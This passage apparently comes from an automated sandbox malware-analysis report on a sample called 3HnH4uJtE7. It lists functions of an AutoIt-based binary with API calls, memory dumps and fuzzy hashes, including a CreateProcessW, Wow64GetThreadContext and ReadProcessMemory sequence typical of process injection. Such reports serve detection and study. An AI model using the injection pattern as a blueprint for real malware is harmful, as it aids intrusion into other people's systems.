                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00952CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00953006
                                                                    • CloseHandle.KERNEL32(00000000,?,00952CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0095300D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 1d974872f8fb29e7e03be2aa8bf90b1c0a7146fb80370947ce2804234db8a753
                                                                    • Instruction ID: ce01a6c610cbf6abc3728f958ee630550cd5530379513f0b6de31f4a0e4b9431
                                                                    • Opcode Fuzzy Hash: 1d974872f8fb29e7e03be2aa8bf90b1c0a7146fb80370947ce2804234db8a753
                                                                    • Instruction Fuzzy Hash: 38E0867369531077E2301765BC0DF8B3A1CD786B71F104224FB1D751D046A0254193A8
                                                                    Function 008F1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 008F17F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID: CALL
                                                                    • API String ID: 1385522511-4196123274
                                                                    • Opcode ID: 5e0d29d23791717169ac1e615015211f7a435ebc75b13e00c959bd1d3e2508a7
                                                                    • Instruction ID: 1ccef47778a186a0d2029ede60ddb28bf5c4c13c0e7b23114d1dd0ff452d9ac6
                                                                    • Opcode Fuzzy Hash: 5e0d29d23791717169ac1e615015211f7a435ebc75b13e00c959bd1d3e2508a7
                                                                    • Instruction Fuzzy Hash: F1227C70608209DFCB14DF28C484A2ABBF1FF99354F14892DF696CB261D775E845CB92
                                                                    Function 00956EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00956F6B
                                                                      • Part of subcall function 008E4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EFD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad_wcslen
                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                    • API String ID: 3312870042-2806939583
                                                                    • Opcode ID: 442364f70fec5ca6b4dd7d0c82c9e5d07ba012ed7ef3898a69077e256cd01bf9
                                                                    • Instruction ID: f79df18be358865ca7d77c5ba12d409950c519ba6f96b8f8e2f0d7cd1438bf20
                                                                    • Opcode Fuzzy Hash: 442364f70fec5ca6b4dd7d0c82c9e5d07ba012ed7ef3898a69077e256cd01bf9
                                                                    • Instruction Fuzzy Hash: 8AB1A2315082419FCB14EF26D49196EB7E5FF95700F44486DF896C72A2EB30EE49CB92
                                                                    Function 008E2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00922C8C
                                                                      • Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2
                                                                      • Part of subcall function 008E2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                    • String ID: X
                                                                    • API String ID: 779396738-3081909835
                                                                    • Opcode ID: ddefdb7a4d56278dd2090d9fba325aeb10c1c3de737a69e3064f33c4c547e571
                                                                    • Instruction ID: 964928d853704931e82e3b1da3ec130545d4262568ed5c1728abd8656d587051
                                                                    • Opcode Fuzzy Hash: ddefdb7a4d56278dd2090d9fba325aeb10c1c3de737a69e3064f33c4c547e571
                                                                    • Instruction Fuzzy Hash: B621C671A002989FCB01DF99C809BEE7BFCEF4A314F004059E405E7241DBB499898BA1
                                                                    Function 008E3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: a304826670dd33ea284e02ecbcb7c9448ca7706d28d3aa8a3ece59ee09a9a45c
                                                                    • Instruction ID: b5428bb382779d9cb9e871911a91288d1b18eeb494255cc7dd74fa3c24e66ba3
                                                                    • Opcode Fuzzy Hash: a304826670dd33ea284e02ecbcb7c9448ca7706d28d3aa8a3ece59ee09a9a45c
                                                                    • Instruction Fuzzy Hash: F031C3B15083408FD720DF25D8987A7BBE8FB4A718F00092EF699C3250E771AE44CB52
                                                                    Function 00BE0A65 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00BE1223
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00BE12B9
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00BE12DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743712764.0000000000BDF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BDF000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bdf000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                    • Instruction ID: 8cb84ad7a8cbdb612f202cc502f878a9fc18fe808cf89bbf5cb855b77b8c7784
                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                    • Instruction Fuzzy Hash: 8412DD20E24658C6EB24DF64D8507DEB272FF68300F1094E9910DEB7A5E77A4E81CB5A
                                                                    Function 008FFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: 19f16fd574091cf678089c7e52cb3d374d5b42f3bdf4c1a8329ff0381ed8f3c2
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: 0E31F274A0011EDBD718DF69D480969FBA2FF49304B2486A5EA09CB656E731EEC1CBD0
                                                                    Function 008E4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E9C
                                                                      • Part of subcall function 008E4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008E4EAE
                                                                      • Part of subcall function 008E4E90: FreeLibrary.KERNEL32(00000000,?,?,008E4EDD,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EC0
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4EFD
                                                                      • Part of subcall function 008E4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E62
                                                                      • Part of subcall function 008E4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008E4E74
                                                                      • Part of subcall function 008E4E59: FreeLibrary.KERNEL32(00000000,?,?,00923CDE,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4E87
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressFreeProc
                                                                    • String ID:
                                                                    • API String ID: 2632591731-0
                                                                    • Opcode ID: 84ccdf8601e5232ff40eebbe9e47a40a2a16a7a1e52544f573856d475e4e47fa
                                                                    • Instruction ID: 410d3f0fd7d8bad53b9ffe1352a41a433cdf0d5bb12cf1c4dc246e2921a2c780
                                                                    • Opcode Fuzzy Hash: 84ccdf8601e5232ff40eebbe9e47a40a2a16a7a1e52544f573856d475e4e47fa
                                                                    • Instruction Fuzzy Hash: AF11E332610205AACF14FB6ADC02FAD77A5FF81B14F10882DF54AE61C1EE749A459751
                                                                    Function 00918402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: __wsopen_s
                                                                    • String ID:
                                                                    • API String ID: 3347428461-0
                                                                    • Opcode ID: a7417fdac8ee5af79f9636175ab1472027bb937f4e199420493ab7bb886b1dc8
                                                                    • Instruction ID: 8df5a26e7c9643bd1664bd64ebcc83ca2c43283cb6a26ac9ca5192c6048375b1
                                                                    • Opcode Fuzzy Hash: a7417fdac8ee5af79f9636175ab1472027bb937f4e199420493ab7bb886b1dc8
                                                                    • Instruction Fuzzy Hash: 58114875A0410AAFCF05DF58E941ADB7BF9EF48310F104059F808AB352DA30DA11DBA4
                                                                    Function 00915000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00914C7D: RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE
                                                                    • _free.LIBCMT ref: 0091506C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                    • Instruction ID: 1d2729c05727d938cabde99966e51720ac0ecb83c97a84c8e72dcc4a8515f11f
                                                                    • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                    • Instruction Fuzzy Hash: 71012B72304708ABE3218F559841ADAFBECFBC9370F66051DE194932C0E6306845C6B4
                                                                    Function 0090E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                    • Instruction ID: 06f5a3f64737e294255afaffbf0d893b761c9d39ddeb74f3f0606aea3518063d
                                                                    • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                    • Instruction Fuzzy Hash: 69F02832611A189ED7313A69AC05B9B339C9FD2335F100F15F431D71D2CF75E84186A5
                                                                    Function 00914C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,008E1129,00000000,?,00912E29,00000001,00000364,?,?,?,0090F2DE,00913863,009B1444,?,008FFDF5,?), ref: 00914CBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
                                                                    • Instruction ID: fc4647b72c511a57fba32a46852a5b3a57586ae49ae36da7b72186986cef8eb7
                                                                    • Opcode Fuzzy Hash: 311a99f5267ca7087aee1c41914c691aab27b2675ed3eda767eebaabf900ea71
                                                                    • Instruction Fuzzy Hash: ABF0E93174622C6BDB215F669C09BDA378CBF957B0B148125BDA9A65D0CA30D88096E0
                                                                    Function 00913820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
                                                                    • Instruction ID: f8884b01ee2ea1e994d23fe7d97739796a8870a45df305c689955a5df57e81bd
                                                                    • Opcode Fuzzy Hash: 949542fa992ac8339cca61fb5dd72c49195c38ca560ccaafc0f420c93595d499
                                                                    • Instruction Fuzzy Hash: A6E0E53130422C9AD63127669C04BDA377CAB827B0F05C1A0BD1992CD0DB10DE8181E0
                                                                    Function 008E4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,009B1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 008E4F6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: aba62eff02de8c96a8c36b1319aed24b86256494beaf5591456e53f7b498a9d3
                                                                    • Instruction ID: d90350bcfebac2d20f774561b9dec24329e37a17f818ee33feeae29d90d01794
                                                                    • Opcode Fuzzy Hash: aba62eff02de8c96a8c36b1319aed24b86256494beaf5591456e53f7b498a9d3
                                                                    • Instruction Fuzzy Hash: A6F01C71105791CFDB349F66D494812B7E4FF15719310997EE1EE82511CB359C84DB50
                                                                    Function 008E2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E2DC4
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_wcslen
                                                                    • String ID:
                                                                    • API String ID: 541455249-0
                                                                    • Opcode ID: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
                                                                    • Instruction ID: 13802ecb18c35bd67c5232ebfa84e1d4e3c7560424a0c3fdd0aab5e663a6726a
                                                                    • Opcode Fuzzy Hash: 6de7f2b415c3557f34796a73351ae0f1800bde45458397852044a18c8d4481e3
                                                                    • Instruction Fuzzy Hash: 7EE0CD726041245BC71092589C05FDA77DDEFC87D0F040075FD09D7258DA60EDC08551
                                                                    Function 008E2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E3908
                                                                      • Part of subcall function 008ED730: GetInputState.USER32 ref: 008ED807
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 008E2B6B
                                                                      • Part of subcall function 008E30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008E314E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                    • String ID:
                                                                    • API String ID: 3667716007-0
                                                                    • Opcode ID: 8803b4c9586b8534a2cfd85091891b75048461d1b367956c5b48aca7c67f3661
                                                                    • Instruction ID: fe90da762833e17b94a52b9526af4db108ef09596f1607f93f2e385b3f0e9d99
                                                                    • Opcode Fuzzy Hash: 8803b4c9586b8534a2cfd85091891b75048461d1b367956c5b48aca7c67f3661
                                                                    • Instruction Fuzzy Hash: 0BE0DF2230828402C604BB2AA82A5ADA34AEBD3321F80053EF092C3172CE2049894213
                                                                    Function 0092039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00920704,?,?,00000000,?,00920704,00000000,0000000C), ref: 009203B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
